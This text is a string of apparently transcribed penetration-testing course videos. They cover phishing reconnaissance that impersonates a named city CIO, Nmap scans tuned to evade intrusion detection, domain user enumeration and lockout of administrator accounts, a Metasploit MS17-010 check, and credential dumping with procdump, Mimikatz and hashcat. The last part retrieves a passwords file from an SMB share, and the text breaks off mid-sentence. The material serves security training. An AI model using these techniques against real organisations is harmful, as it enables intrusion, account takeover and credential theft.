So I have in front of me the City of Ottawa Business Technology Plan for 2014. The reason why I chose this is because it's out of date, but it still follows a lot of the practice that we see organizations doing in modern day, especially with their business technology plans and with RFP documents as well, and even with job ads that they put out there. I chose an older one because I didn't want to pick apart something that was active or put any organization in any real danger. So I'm going to scroll down, and there's one thing here that I want to look at, and this is the message from the CIO. So here the CIO's crafted a message. It's a bunch of business speak saying, hey, we're going to do great things. But if we look at the bottom, we get the CIO's name and their title. So I now have a user account potentially that would have tremendous access to the organization. My goal at this point is to find out what Jeannie Bethel's password is, or how I can gain access to Jeannie Bethel's account, or even spoof being Jeannie Bethel to gain admin access on a system. If I scroll down to page 16, here I'm going to see some information that's going to give me some insight into the turnover of the organization. So I have the Human Resource Employee Onboarding Solution went live in March of 2013 and has processed 1,180 new hire movements. That's a lot of new people coming into the organization. That's roughly 3 a day on average. So that means I'm going to be able to target new hires within this organization frequently with some type of dedicated phishing attack to that user. And the reason for this is because new users don't often get cyber awareness training as part of the onboarding process. They typically get it in periodic chunks throughout the year where they'll bring everyone in a room and remind them what malware is. But if they haven't received that training yet, that means that they are going to likely click on that link, or they're more likely to click on that link than someone that hasn't. If I go down to page 19 here, this isn't quite obvious, but we have this online training registration. It says 12 city departments have indicated a need to implement SAP's online training registration and tracking for training delivered by their departments. Now, in reading that, my first thought is this is a great spear phishing campaign. I can pretend I'm Jeannie Bethel, the Director for IT Services and Chief Information Officer, and I can send mass emails to these individuals, these departments, requiring them to sign up for their online training registration. And then suddenly I'll get an influx of potential username and passwords that are very likely going to match username and passwords that are in use on the corporate network. If I go down, I get another one here with the implementation of a new sick leave notification protocol that would involve employees providing managers with documentation. This is another place where I could do a spear phishing campaign, pretending I'm the Director of IT Services saying, hey, please sign up on this site for the sick leave notification protocol, and please provide your manager with any supporting documentation on this site going forward. And when they set up an account on that website, it doesn't have to do anything, it could just collect that information for attack. Now, if I go down to page 26, this one's especially interesting. On page 26, we have an actual network diagram. We have their infrastructure diagram. And this is important because if I find out that I have a laptop device or a cellular device that I've somehow gained control of, I know that's probably not on the actual corporate network because of the way this is structured. Additionally, I can see that the library computers are on the WAN LAN. They're on the library internet, but they connect back. So that means that I might be able to use these library computers to conduct an attack against their actual production server. If I continue along and I go down here to page 28, what I get is some insight into what they're currently running. So it's telling me they have Windows Server 2003, and they have 400 application servers that are currently using that operating system, and that they're intending to do an upgrade prior to July 2015, where it says that they will use Server 2008. So I know what operating system I'm to expect. I can also tell because they're using that many Windows servers, chances are this is an Active Directory environment, and probably a complete Windows environment where they have Exchange and other services as well. I look down further and I see Windows 7 migration, and this is where they want to move their computers and laptops that are currently running Windows XP over to Windows 7. Given how long Windows XP was out, this was actually 14 years after release, this tells me that this organization might have skipped Vista. They're not exactly keeping up on their operating systems, so I know in the future that I might see a mixture of machines, but they do have to be within the Microsoft support window. Though with 400 application servers and the number of desktops and laptops this organization would have had, it's likely that they didn't hit that target. To move 400 application servers over, some that are supporting legacy applications, to a new server environment within a short time frame isn't always going to be a project that's successful. So there might still be some Windows Server 2003 servers within that environment even today. And if I go down, I also see on the future page here where they're going to move to Microsoft SCCM Upgrade 2013. So I now know that they're using SCCM in order to manage all of their systems. I know that they're using a server that was 10 years old and had reached end of life. So they're really stretching the lifespan of their machines. And this is information that I can use in an attack. I could go out and look through ExploitDB to find out what exploits exist for SCCM. I could try to find a way that I might be able to gain access to that machine and take over their network, or even if I do gain access to a remote computer on their desktop, use that machine to gain further access into the network to sort of elevate my privileges, or maybe even get a remote session on that machine as a user account or even as an admin account if such an exploit exists. Now if I go all the way down here, we get a strategic map, and this gives me an idea of what the organization looks like as a whole. So they have residents, enterprises, visitors. All of this information is information I could use if I want to do any type of spear phishing campaign. I can pretend that I'm within the government planning and decision making department, or that I'm working with employee engagement or the Office of Financial Responsibility. And I could send out an email that relates to any one of these top level strategic goals, with strategic goal for climate change in the title, say that I'm from the Office of Employee Engagement and I'm looking for individuals to give me information or feedback about climate change initiatives within the office. And surprisingly, I'll very likely get responses. This is how this information can be used to conduct an offensive operation. So I have my Kali Linux environment opened up, and I want to show you Nmap as a utility and how you can scan a network to find hosts that are up and operational on that network. So you can actually run Nmap in a bunch of different operating systems, including Windows. I just prefer to run it in Kali. I'm going to start by opening up the terminal. I'm just going to make this a bit bigger for the recording window here. Perfect. I'm going to type in nmap space 192.168.2.0/24. So my subnet for my machine is on a 192.168.2/24 network. So when I do this, this is going to run the basic Nmap scan, the standard scan that it will always run without any options. So this is starting the Nmap scan. It's 10:07 in the morning. We'll see how long this takes. It shouldn't take long for this to happen because there's not many hosts that are up. So it took 13.39 seconds to scan 256 IP addresses, where it found 9 hosts that are up. And this will actually scan about 1,000 ports per machine to give you an idea of what is available. And it scans the most commonly used ports. So I can see that there's port 53 on this machine. So chances are port 80, 139, 443, this might be a domain controller that's running on my home network. And if I go down, I can see where at the bottom, or the second to the bottom, where it reported a MAC address of B0EE7B735225, and it actually said that that's a Roku device. So that MAC address is registered to the company Roku. So we know that this is a Roku device. Now Roku is a TV, so I know that that's probably a TV or some type of DVR system. So the next thing I want to do is I want to run the same scan but I want to run it in verbose, and I want to run it as verbose as possible, so I'll do -VV. And this is going to give a different output. Now what I want to see here is what information this is going to give us that's different from the information we already have. So when I hit enter, it's going to start scanning, and we can see a ton of information is coming up almost immediately. The first thing that we see is where it scans for all the different hosts. So we can see where it's scanning for all the different hosts. And it's saying host is down, so we get 2.0, host down. So this is, first thing it does is it isolates which hosts are up. And after it isolates which hosts are up, then we see where it discovers the port scan, where it scans the different hosts for each port. And it gives me the information at the end of which ports are open on which machine. So that information can be a little bit more useful if you want to see how this is responding, or if you want to get more output from your scan. Now, because this gives such a large output, chances are you're going to want to output it to a file instead of reading through the terminal to try to find the information. The next thing I want to do is type in Nmap -P, and I'm going to put in 80. So this is going to scan for port 80, so for open web servers that are running non-SSL. And I'm going to scan the entire subnet just for that port. So when I hit enter here, this is going to tell me which machines on my network have port 80 open, so what are running a web server. And I can see there's quite a few here. Now this is just a home network. One of these might actually be my washing machine. So keep in mind that chances are you're going to find a lot of different port 80s open on a network. It's very common now for IoT devices, for software, for systems to have their own built-in web server. That entire scan took only 1.91 seconds to run. So that ran very fast. Now an intrusion detection system might pick that up. So in order to avoid that, there's something we can do where it's called a SS scan. Now what this does is this is going to scan for SYN packets. So I'm going to do 192.168.2.0/24. Now this will take a little bit longer to run, but it's going to report a little bit differently as well. So I'm just going to pause the video and I'll come back once it's finished. Okay, so it's done. It took 12.68 seconds to run, which is much different than the previous one, which only took 1.91 seconds. And we can see it gave very similar output to the first thing that we saw, where we could see each system and what ports are open on it. Now, there's another scan that I typically like to run, and this is just to map the network. So I don't like to scan the entire network for ports that are open. That's going to set off the intrusion detection system. That's going to raise alarms. If someone's actually paying attention, they're going to be able to respond and block me relatively quickly. So I'm going to do Nmap -N, which means it's not going to do DNS, -SN, which means it's not going to do a port scan either. And I'm going to scan the entire network. And all this is going to do is tell me if that host is up or down. So when I hit enter, it's going to scan 1.67 seconds later, and I have a list of IP addresses and MAC addresses that are up. And this is fantastic because this is really all I want to see when I go to move into the next step of my attack. So the next thing that you may want to consider is that was a very quick scan of everything on the network. That still might get picked up by an intrusion detection system. So we can use the -T and then a number, 0 through 5, where 0 is the slowest and 5 is the fastest. So I'm going to kick this off, and then I'm going to pause the video and come back in a few minutes so we can terminate it and see how long a scan of the network with T0 would have taken. So I'm going to press the enter key, and this is going to go about this very, very slowly. The previous scan took 1.67 seconds to run. Keep that in mind, and I'll be back here in a few minutes so that we can cancel this scan and see how long it would have taken. So this scan has been running now for about 12 minutes. I'm just going to hit the enter key. And we'll see that according to this, there's about 7 hours and 11 minutes remaining. It's only 2.75% done. Now, the reason why you do this is if you're really paranoid about setting off an intrusion detection system, And running it in this method, chances are it's not going to set off any intrusion detection systems. At the same time, you're sacrificing speed for the sake of safety. This is something that you typically only really do if you're doing a penetration test. If you're doing any type of offensive operation, chances are speed is going to be the name of the game, and you're going to just hit it as hard as you can, as fast as you can, maybe just doing the -n-sn and scanning a little bit slower, maybe T4, T3, instead of going with T0, which is going to take the better part of a day to run. So let's say you have isolated a host on a network that you want to scan, and you want to take a deeper dive on that host to gain some information on what that machine has running on it. So I have Kali Linux here. If you open up the terminal and I'm going to make it larger screen here so we can see what's going on. And I'm going to write nmap space minus capital O 192.168.2.52. Now what this is going to do is this is going to scan that IP address 192.168.2.52 for the operating system information. I'm just going to hit the enter key here. In addition to the operating system information, it should do the typical port scan where it tells me the different ports that are open. So I can see port 53 is open, so DNS is there, HTTP, we have MSRPC, LDAP, HTTPS. So there's quite a bit of services running on this machine that might be vulnerable. In addition, here towards the bottom, I can see the OS details. So this machine is either running Windows 7, Windows Server 2012, or Windows 8.1 Update 1. Now, chances are, because we're seeing domain services DNS open on this machine, along with MSRPC, this is very likely a domain controller. Let's take a deeper dive on this machine, shall we? So we're going to do an nmap again, nmap space minus capital A 192.168.2.52. Now this is going to scan very similar to what we just did, except this is going to actually try to get us the service information that's running underneath these ports. So I'm going to press enter, I'm going to pause the video, and I'll come back once this is done because this takes 3 or 4 minutes to run. Okay, so that script is now finished running, and we can see here we have a lot more information on the actual services that are running. We can see that the DNS version bind request, it doesn't give us the version. We have IIS 8.5, and then it tells us that there's some potential issues here. We have Windows Kerberos, gives us the server time, Windows RPC, Windows Active Directory LDAP with the domain of testing.local. So we have a lot more information now that we can use if we want to attack these services. So we can actually go and do a search to see if there's any possible exploits out there for IIS 8.5. We can go down and we can see that all these different ports here at the end are RPC ports. So maybe there's a specific service that uses RPC on these ports. There's all sorts of information here that we can now use going forward to conduct our operations. Another command I want to do is I want to run just the simple nmap command minus SS 192.168.2.52. And the reason I'm doing this is because this is much stealthier of a scan. Now, it's 2.55 seconds to run, and it just gives me the ports that are open. But really, this is all the information I would typically look for. I know this is Windows because I can see port 445 is using Microsoft-DS. The domain on 53, along with Kerberos, like this is very likely a domain controller that we're looking at. 2.55 seconds to run, and -SS is going to be a SYN scan, so it's not going to set off as many alarm bells as the scan we did above, where we did a much deeper scan of the operating system. If they had any host-based intrusion detection system, that second scan we did with the -A would set it off. So at this point, I want to run a different command. I want to run enum for Linux, space, and I'm going to do a -U, uppercase U, 192.168.2.52. So I suspect that this is a domain controller, and what I want to do here is see what users exist within the domain controller. So I'm going to scan just for the users. So I hit enter, it's going to go through, it's going to scan, and it's going to give me the different accounts that exist on this machine. So I can see here we have Alice, Frank, and Guest. So there's 3 different accounts here that exist on this domain. If you're scanning a domain controller in an actual domain, you should have much more users than this. This was configured just for testing purposes, but you get the idea. You can see the different user accounts that exist, so now you have a larger attack surface. So if you can get one of these users to give you their password, or if you can guess a username and password combination, chances are you're going to get access to more information and be able to eventually get root access or domain admin access to the network. The next command I'm going to run is enum for Linux space -a space 192.168.2.52. Now this is going to output a lot of information all at once, so I'm just going to let it run. But what it's doing is it's running all the different types of scans that enum for Linux can run. So just starting at the bottom, we can see the different groups that exist and who belongs into each group. So in domain users, I have Alice, Frank, KRBTGT, that exists on every domain controller, and administrator, which should also exist on every domain controller unless it's been changed. And we go up, we can see the different domain groups that exist. If you can find one in there called IT and you can pull out the different IT users, chances are they're going to have elevated access compared to a local regular user account. If we go up, we can see the password information for the domain of testing, and it's testing.local in this case, but we have a minimum password length of 7, and they can store up to 24 passwords before they can use a password again. Minimum password age is 1 day, 4 minutes. We have a reset account lockout counter. So if I put in the password wrong 3 times, it's going to lock that account. Now, one trick you can use when attacking an Active Directory server is if you have all the different domain accounts here, you can actually keep them locked. You can lock them by trying to authenticate as them rapidly with the wrong password. You can effectively lock the domain admin out until you can gain domain admin access. If I scroll up here, I can see the different protocols. So it found the domain testing. It couldn't find very many shares. And if I go up, I get the MBT stat information and the target information, which just gives me the known usernames that it's typically going to target. And because the account was done just without any username and password set, it just tells me that there was no username and password set. You can run these commands. If you can get a user account on the domain, you can run these enum for Linux scans as that user, and you're going to get more and more information the deeper you get into the domain and the more access the user has. So let's take a look at the Metasploit module and some of the tools you can use with Metasploit so that you can get a little bit better usage out of it. So I'm going to make this bigger. We open up the terminal. This is a Kali machine. You can use other versions of Linux, but you do have to have Metasploit installed. And I'm going to type in searchsploit space Windows space SMB. So what I want to do is I want to search the Metasploit database and find what exploits exist for Windows and the SMB protocol. I'm going to hit enter, and I'm given all these different possible exploits that I can run that exist within the application. So I can see there's some for Windows Vista, Windows 7, Server 2008, Windows 95. Really hope you don't find that one out in the wild. Bunch of different SMB exploits exist. Let's say I wanted to search for Windows and IIS. I hit enter, and here's all the exploits that exist for Windows and IIS, and as you can see, there's a lot of them. There's a lot of them that exist, especially when you're looking at legacy applications. So now let's open up Metasploit. So to do this, you type in MSF console and press enter, and this will load into the Metasploit framework. Now, if you're doing this at home, what I'd recommend is you set up an environment where you have a Kali machine, an attacking machine, and you download Metasploitable itself from Metasploit. It's an exploitable virtual machine that allows you to execute payloads and practice your usage of Metasploit. So I have the MSF console up and running here. I can see there's 1,876 exploits, 1,061 auxiliary attacks, and 328 post attacks. So post attacks typically are run after you've already gained access to a machine, and auxiliary things can be things like fuzzing or scanning a system to see if there's an actual attack you can run. Once again here, I just want to type in search space and SMB. So previously we were running searchsploit from the actual console. Now that we're connected within the MSF console, let's type in search and SMB. And this gives a lot more results because this doesn't just give you the exploits, this will also show you the post exploits. This will show you what auxiliary options you have as well. So this gives you a much broader view of what's available within Metasploit. Now, what we want to do is, whenever you first open an application, typically what I like to do is read the help file. So type in help and press enter, and this will give you the help options. And you can see there's a few different options you can use here within Metasploit that you're going to want to get familiar with. The main ones that I typically use are going to be use, which is going to set something that you want to use, set, which allows you to set a variable, and then you have show, which is going to show you the options, and exploit, which actually runs the exploit itself. So I'm going to run a scanner here. So I'm going to type in use space AUX, and I'm going to hit tab. So Metasploit has tab finishing for you, so I can type in, if I hit tab twice, it will try to display all possible entries that are coming up. So it says there's 1,061 different auxiliary options. Press N, I don't want to list them. Type in scanner, SMB, and I'm just going to hit tab twice, and this is going to give me all the different SMB ones that exist within the scanner. And I can see them here, and they are tab completed. So I'm going to do, let's run a scan of the system for MS17010. It shouldn't be exploitable for this. It is a newer version of Windows, the Server 2012. It does have some updates that have been run on it. But let's use this as a sort of a demo here. Let's go show options. So we want to see what options are available for the scan. And here I have different options. We have rhost, domain, pass, and user. Another one you'll often see is lhost. Rport is the remote port. Lport would be local port. Rhost is remote host. Lhost is local host. So typically you want to set the rhost to the IP address of the machine you want to scan. So I'll scan 2.52, and I'll just type in show options again. And I can see when I typed in set space rhost 192.168.2.52, we can see that it actually set the rhost value to 2.52. Now if I had a username and password here, I could put it in, but let's just run the exploit by typing exploit and hitting enter. And this is going to scan the remote machine, 2.52, return the option that it does not appear to be vulnerable to that specific attack. So we now know that this attack isn't one that we can use against this specific machine. There may be other machines on the network that we want to scan for this potential attack though. So to do that, we would just change that rhost value and run it again.
In this video, we'll investigate Windows event logging. Okay, to get started, I'm going to open Event Viewer. So down on the taskbar, I'll click Start. I'll start typing Event. And Event Viewer shows up in the matches. I'll click the app to open it. Okay, and now it is full screened, which is great. And on the Overview and Summary page, of course, I have a summary of events. Now, we are going to drill down, but this just gives you a look at all the types of events that we have. So we have critical, we have error, we have warning, we have information. We also have audit success and audit failure. So we have the whole gamut here. Now, in Windows Logs, in the left pane, I'll expand Windows Logs, click Application. These are the application logs. Now, the application logs have different levels. So we see information, there's also error, warning, and others. So if we wanted to filter the log, so I'll click Filter Current Log in the right pane, then I can choose what event level I want to look at. Critical, warning, verbose, information, or error. I'll select error, and I'll leave all event IDs selected here, and I'll click OK. This is all the errors in the application log. Now we also have a security log here. Now in the security log, you have audit success and audit failure events. So again, here, if you wanted to filter the current log, so I'll click Filter Current Log under Actions in the right pane. Then I could look for all events. And then under Keywords, if I expand the Keywords drop-down list, I can select Audit Success or Audit Failure. So if I choose Audit Success Only, it will show Audit Success Only. If I choose Audit Failure, it'll show Audit Failure. So I'll uncheck Audit Success. Let's see if we have any failure items. So I'll click OK. And there we do. We have a couple of failure items. Now, we want to drill down into the individual log entry. We just click on it. On the General tab, we have some general information. And then we can drill right down into the details by clicking the Details tab. Okay, those are the security logs. Now we also have the system logs. Now, click System. And now here, again, we also have information, errors, and warnings. So for example, if I click on Filter Current Log, again, let's just take a look at the warnings. In the Filter Current Log dialog, I'll click the warning checkbox, and I'll leave all event IDs selected, and I'll click OK. So these are all the warnings for the system logs. Okay, now let's see if an event gets logged in the application log. So what we're going to do is we're going to disable Windows Defender Real-Time Protection. Down on the taskbar, in the notification area, I'll click the up arrow, and I'll select the Windows Defender Security Center icon. I'll maximize Windows Defender Security Center. Okay, so now I'll click Virus and Threat Protection. Now I'll click Virus and Threat Protection Settings. I will disable Real-Time Protection. And if a user account control dialog appears, I'll click Yes. Now we could also disable these other protection settings, but we won't for now. Okay, so now let's go back to Event Viewer. And now we're going to look at the application logs. So I'll click Application Logs. And now I'll filter the current log. I'll uncheck Error, and I'll check Warning and Information. And I'll click OK. And we can see that we have some events here. So we have some information about the security product. So if I click on one of these information events, we see in general, updated Windows Defender status successfully to security product state snoozed. So these events were logged this way because we disabled Windows Defender real-time protection. Okay, now, one other thing, local security policy. Okay, so down on the taskbar, I'll right-click, select Run, and I'm going to specify seccpol secpol.msc. I'll select OK. Now I'm going to maximize the local security policy window. So now, if I look at these policies, the local policies, I'll expand local policies. My audit policy is under local policies. I will click audit policy to see that in my audit policy, none of the basic audit policy settings have been enabled. So there's no auditing taking place by default here. Okay, so that is event logging in Windows 10. In this demo, we'll use basic Windows and PowerShell commands. Okay, to get started, I've opened an elevated Windows PowerShell prompt, and I've also opened an elevated command prompt. I'm going to work almost exclusively in PowerShell, but at the end, I'll show a couple of commands that can be run in command prompt as well. Okay, so to get started, we can actually show the registry and list registry values in PowerShell. So to do that, I'll just type cd registry : Okay, and now I'm in the registry. So now I can actually list the hives. So if I type ls and press enter, that lists the hives that I have in the registry. So there's hkey local machine, current user, classes root, current config, and hkey users. Okay, so now I'll clear. And now to get out of the registry, I'll just type cd /wexf, that's my working directory, and here I am again. So I'll type clear. Okay, now next, to get a process listing, you can use the get-process commandlet, and that lists all the processes. Okay, similarly, you can get all the services. So we use the get-service commandlet. So I'll type get-service. Okay, now with this commandlet, I'm going to specify a filter as well. So basically, what I want to do is I want to find any services with the 4 words ANTI or anti in them. So hopefully we'll see some services for Windows Defender antivirus. And now I'll specify the display name flag, and I'm going to be searching for asterisk, ANTI, asterisk, so some wildcards, and I'll pipe that into format list. Okay, so pressing enter, and there are the 2 services running. So there's the Windows Defender Antivirus Network Inspection Service. Awesome. Okay, so now let's clear. Okay, get-hotfix is another commandlet that's very convenient. This allows us to interrogate our infrastructure to see which Windows Update patches are installed, or to see if a particular hotfix has been installed. And to use that commandlet, it's just get-hotfix. And I'm going to pipe that into format table, or FT. Okay, and so now we can see all the security updates that have been applied to this system. Okay, next, if we want to list programs set to start automatically in the registry, remember how earlier I showed how we could access the registry? Well, we can use, for example, the get item property commandlet and specify a particular registry key. So for example, we could specify hkey local machine, software, Microsoft Windows current version run, which are the programs that are set to start automatically in the registry. So let's go ahead and do that. So that's get-item property and hklm : /software /Microsoft /Windows /current version /run. Okay, now we can list firewall rules as well. So I'll clear, and to list the firewall rules, we use the get-net firewall rule commandlet. So that's get-net firewall rule -all. So we'll look at all of them. Okay, so we have several firewall rules. Let's clear. Okay, so next, we can find text within a string using select-string. So first what I'll do is I'll create a file named pw.txt, and I'll place the text my password in it. Okay, so to do that, in quotes, my password, greater than, symbol, pw.txt. Press enter. Okay, so now if I cat pw.txt, there's my password. Okay, so now I'll clear. And now let's use the select string commandlet. So that's select-string -path for path, and it's the current directory. But I will type c:\wexf / will look at all files in this directory and specify a pattern -pattern, and the pattern we're looking for is password. Okay, and it found it. So it lists the file that it was found in and where it was found and the string that matched. Okay, so now I'll clear. All right, so now that's it for PowerShell. Let's go over to command prompt. So down in the taskbar, I'll click the command prompt icon to bring up command prompt. Now, command prompt is in an elevated status as well. So what I'll do here, first, I'll type PowerShell-C get-net firewall rule -all. And this lists all the firewall rules just like we did in PowerShell. So we can run virtually any PowerShell command the same way from command prompt here. Okay, so I'll clear. And now, if we want to view current network shares, in the command prompt, it's just net share. And by the way, these commands can also be used in PowerShell. So there's no real reason to actually use command prompt anymore, but I'll demonstrate this anyway. So net share. So this shows me all the shares that we have on this machine. Now, if I want to look at local groups, I'll type CLS to clear, and now net local group. And this reports all the local groups. Another command that is used sometimes is who am I? This lists the domain and the user, or if it's a local machine not joined to a domain, then it lists the machine name and the user. And finally, to view the domain name of the current host, netconfig workstation, and press enter. And among other things, this gives us the logon domain for this machine. Okay, so that's using basic Windows and PowerShell commands to acquire important information about a system. In this demo, we'll crack an NTLM hash. Windows 10 passwords stored as NTLM hashes can easily be dumped and exfiltrated to an attacker's system within just a few seconds. The hashes can be very easily brute forced. They can be cracked to reveal the passwords in plain text. This involves using a combination of tools, including, for example, procdump to get a dump of a process that we can derive the NTLM hashed passwords from, then using Mimikatz to extract the NTLM hashes for the passwords, and then we use Hashcat to actually crack the NTLM hashes. Okay, first step is to download the procdump binaries. Procdump can generate the dumps based on the values of system performance counters. To do that, I've opened up my browser and I've navigated two websites. On my first tab, I've navigated to docs.microsoft.com/en-us/sysinternals, that's SYSINTERNALS/downloads/procdump. Now find the download procdump link and download it. Then on the second tab, I've navigated to github.com/gentilkiwi, that's GENTILKIWI/Mimikatz, that's MIMIKATZ/releases. Now scrolling down the page, find the new releases and download mimikatz_trunk.zip. Okay, so this is the binaries, the most recent release of the binaries for Mimikatz. Now a little bit of background. Mimikatz is a post-exploitation tool to help extract the login IDs, passwords, and authentication tokens from hacked systems. It's one attack method used for privilege escalation and to gain wider access to systems on a breached network. For this demo, we turn off all protections from Windows Defender because Mimikatz is recognized as a threat by Windows Defender. Okay, so I've already downloaded these two applications. Now I'm going to run Windows PowerShell as administrator. I'm going to use the PowerShell terminal to do the procdump and to use Mimikatz. Okay, so now down on the taskbar, I've pinned the Windows PowerShell program, and I'll run Windows PowerShell as administrator. Now alternatively, if I wanted to use command prompt as administrator, I could right-click Start and select Command Prompt Admin. Okay, but I'm going to use Windows PowerShell. So I'll right-click the Windows PowerShell icon on the taskbar, and I'll select Run as Administrator. And if the User Account Control dialog doesn't come up right away, look for it on the taskbar, click it, and then in the User Account Control dialog, click Yes. Okay, now I'm going to maximize the Windows PowerShell window. And now let's cd into the working directory that I've created for this demo, and that's at c:\wexf. And now I'll clear the screen. Down on the taskbar, I'm going to bring up Windows Explorer because I've got the WEXF folder open and I want to show you the folder structure. So basically, Mimikatz_trunk.zip and procdump.zip need to be extracted. So I've extracted Mimikatz_trunk.zip to Mimikatz, a directory called Mimikatz, and procdump to a directory called procdump. Now if I expand these, so I'll expand procdump, And under procdump are the executables directly. We'll be using procdump.exe. And then under Mimikatz, we have Win32, x64, and some other files. If I drill down into x64, that's where I'll find my mimikatz.exe that we'll be using. Okay, let's minimize Windows Explorer and let's go back to Windows PowerShell. Okay, so first let's get a procdump. And we're going to get a procdump of lsass.exe. And I'll explain that as we get to it here. Okay, so to start, type period /procdump/procdump.exe -64. Okay, now -64. By default, procdump captures a 32-bit dump of a 32-bit process when running on 64-bit Windows. This option overrides to create a 64-bit dump and is used only with Windows 64. So that's Windows 32-bit on Windows 64-bit. So not necessarily strictly required in this demo, but we're going to use it anyway. Next option is -MA, and that writes a dump file with all process memory because the default dump format only includes thread and handle information. Then we specify lsass.exe. This is the process that we're going to dump, and this is the local security authority subsystem service. And it's a critical component of the Windows operating system because it's responsible for a number of essential functions like Active Directory management, authoritative domain authentication, and the enforcement of security policies. It spawns the processes that authenticate users with NTLM and verifies the validity of logins. And then the destination, and we're just going to call it lsass.dmp. Okay, pressing enter, and done. So we have a 57 megabyte dump file called lsass.dmp. So now let's clear. Okay, so the next thing we're going to do is use Mimikatz to reveal the NTLM hashes for user passwords. And to do that, we're going to type period /Mimikatz /x64, remember? That's where the executable is, /mimikatz.exe, and I'll press enter. Okay, and now at the Mimikatz prompt, I'll use the minidump command to load the lsass.dmp file into Mimikatz. Okay, and to implement that command, I'll type sekurlsa : minidump and a space and then the lsass.dmp file. So now lsass.dmp has been loaded into Mimikatz. Okay, now we use the logon passwords command to extract hashed credentials. Okay, and for that, I'll type sekurlsa : logon passwords and press enter. Okay, and done. Now if I scroll way back up to the top, I'll find for this user, for my user, the username Joe, I've got an NTLM hash. So I'll highlight that NTLM hash here. And this is the NTLM hash that we're going to crack. Now right-click to copy the NTLM hash to the clipboard. Okay, and now I'm going to go over to a Kali Linux machine. Okay, so over in the Kali Linux machine, I've got the terminal open. Now we're going to run hashcat on the Kali Linux machine. Okay, first let's take a look at the hashcat help file. So that's hashcat --help, and there's a lot of information here in the help file. So for example, the character set. The first value under the character set is lowercase l, and this is for any lowercase letter, and that's what we're going to use. My hashed NTLM password is 4 lowercase characters, and I know this, it's going to help us, otherwise the crack would take longer. So we're kind of cheating, but not really. We're still cracking this NTLM hash. Okay, now the attack mode we're going to use is number 3, brute force. Now scrolling up, in operating systems, we have NTLM, and the code for this hash type is 1000. So that's what we'll use with the hashcat command. Now scrolling all the way back up again, let's take a look. -M is the hash type, -A is the attack mode, and we're also going to use --force to ignore any warnings. Okay, so let's do this. I'll clear the terminal by typing clear and pressing enter. And now I'll type hashcat, and I'll right-click and select paste clipboard to paste the NTLM hashed password in here. Now, The thing is, we could create a file with NTLM hashes in it, but that would be overkill for this demo. We're just going to crack the one hash NTLM password anyway. So we'll just enter it directly here at the command line. Next, -m. So that's the hash type again. So that's 1000, recall. And now -a. And the attack type is going to be brute force. So that's 3. And so now we specify the mask. This will be $L, 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 $L. And this specifies 4 lowercase letters. And then -- force. Again, because we want to ignore warnings. Okay, so pressing enter and done. I'll just scroll down a little bit. Now we've got the status of cracked. So that means we've managed to crack the password. So we've got some other information here, but above the summary, the cracked NTLM hash is listed. So we have the NTLM hash :test. And test is the username's password. So we've successfully cracked an NTLM hash password. In this demo, we'll enumerate SMB shares. Okay, to get started, I've signed into my Server 2019 machine. The whole emphasis here, the idea, is we want to see if there are any shares on a Server 2019 target. Now, I do know that there is one. It's a user-defined share called myShare. So we're going to see how we can enumerate all that information. First, down on the taskbar, I'll click to bring up PowerShell, and I'll maximize the PowerShell window. Now, to check the share on this local machine, now this is not part of the demo of enumeration. I'm just showing that we actually have these shares. So I'll type net share. And I'm presented with all the shares, including the user-defined share, which is located under Documents, My Share on the server. Okay, so now let's go over to Kali Linux and let's see how we can enumerate all this information about the shares on this machine. Okay, so here I am on my Kali Linux. So this is Kali 2020.3. Now the first thing I'm going to do is I'm going to use Nmap, and I want to see if we have some SMB ports open on the server. So I'll type nmap-pn, which just says to treat all hosts as online, and the IP address of the server. So pressing enter. Okay, and Nmap tells us that we have ports 139, 389, and 445 open. So 139 is NetBIOS, 389 is LDAP, and 445 is the port used for SMB. And LDAP, as we'll see in enum for Linux, is important if we want to get additional domain controller information. Okay, so let's clear. And now let's look at the enum for Linux help. So I'll type enum for Linux --help. All right, and now scrolling up to the top. So basically, we can get all the information that we need about the SMB shares from enum for Linux. And I'm going to specify some flags. I'll specify the -s flag, which gets the share list, -u for the user list. I'll also specify -P, which is password policy information. Very important, very useful. And -G to get group and member lists. So if you find a user that belongs to, for example, a domain admins group, you know that that user has quite a bit of power across the whole domain. Okay, now carrying on, I'm also going to specify the -L flag, and that tells enum for Linux to get some other information about DCs, about domain controllers, and that's on port 389. And we know that port 389 is open. We saw that when we ran Nmap. Now I'm also going to specify -O, which gets some OS information, -N, which does an NMB lookup, which is similar to NBT stat. And I've also specified -V, and that's for verbose, which shows the full commands being run, including, for example, RPC client and so on. And I'm going to specify the user, that's administrator, the password, we've already got that information from a previous hack, and I specify the IP address. So let's go ahead and do that. So first I'll clear, and now the command is enum for Linux -S -U -P -G -L -O -N -V -U, and the user is administrator, and -P password and that's capital P @SSW0RD. And the server IP address. Now, if we wanted to run all of these with one flag, we can use the -A flag, which runs all the simple tests. But I wanted to go over these individually so we could see what they were and how they work. Okay, so let's go ahead and run this command by pressing enter. A lot of information here. So let's go right up to the top. Okay, so there we go. Now, it tells us, enum for Linux tells us all the programs that it's running. We have the target information. We have the enumeration of the workgroup and domain information. Scrolling down, we can see NPT stat information, session check information, and here's where we're getting the information via LDAP for the server. So, for example, here it tells us that the long domain name is corp.internal. It also appears to be a root parent domain controller. That is important as well. Then we can get the domain SID, the operating system information for the server. Then we have a list of users. So this is important too. So we know that these users exist on the machine. Now scrolling down, we have the share enumeration. And after all, that's what we are really after to begin with. And here's the my share. Scrolling down, we can get the password policy information. Again, this can be important. Continuing, we've got groups information. So we have the administrators group, and I know that the jQuery user and the administrator are members of the administrators group. So a lot of power on the local machine. Now, scrolling down, close to the end of the output, I can see that both administrator and the jQuery user are domain admins. So they have power across the entire domain. A lot of information here. So now let's clear. And now, knowing that information, I'm going to use SMB client to attach to the share. So now I can also use SMB client to list the shares as well. So I'll type SMB client -L to list the shares and the IP address of the host. And I'll enter my Kali password, and there we go. So I can see again my share. That is the share that we're going to exploit here. Okay, so now let's use SMB client again to connect to this share. So first I'll clear, and now for that I'll type SMB client / the IP address of the host / and the share name. And I'm going to specify -U, and that's for user, and I'll specify the administrator user. Okay, so pressing enter, now I'm asked for the administrator's password. Okay, and now I'm at the SMB prompt, which means that I've attached to this share. So I'll start by typing ls to get a listing. Oh, and I see that there's a folder under my share called archive. So let's go down into archive. So I'll type cd archive. Okay, now if I do a listing in archive, oh, look at that. We have a passwords.txt file. Now the beautiful thing about the SMB client is that it's a lot like an FTP client. So I want to bring that passwords.txt file over to my local machine. So I'll type get passwords.txt, press enter, and now I have that passwords.txt file on the local Kali Linux machine. So now if I exit out of SMB client, clear, and then type ls, I'll see that I now have passwords.txt. And if I cat out passwords.txt, I'll see that it's got 4 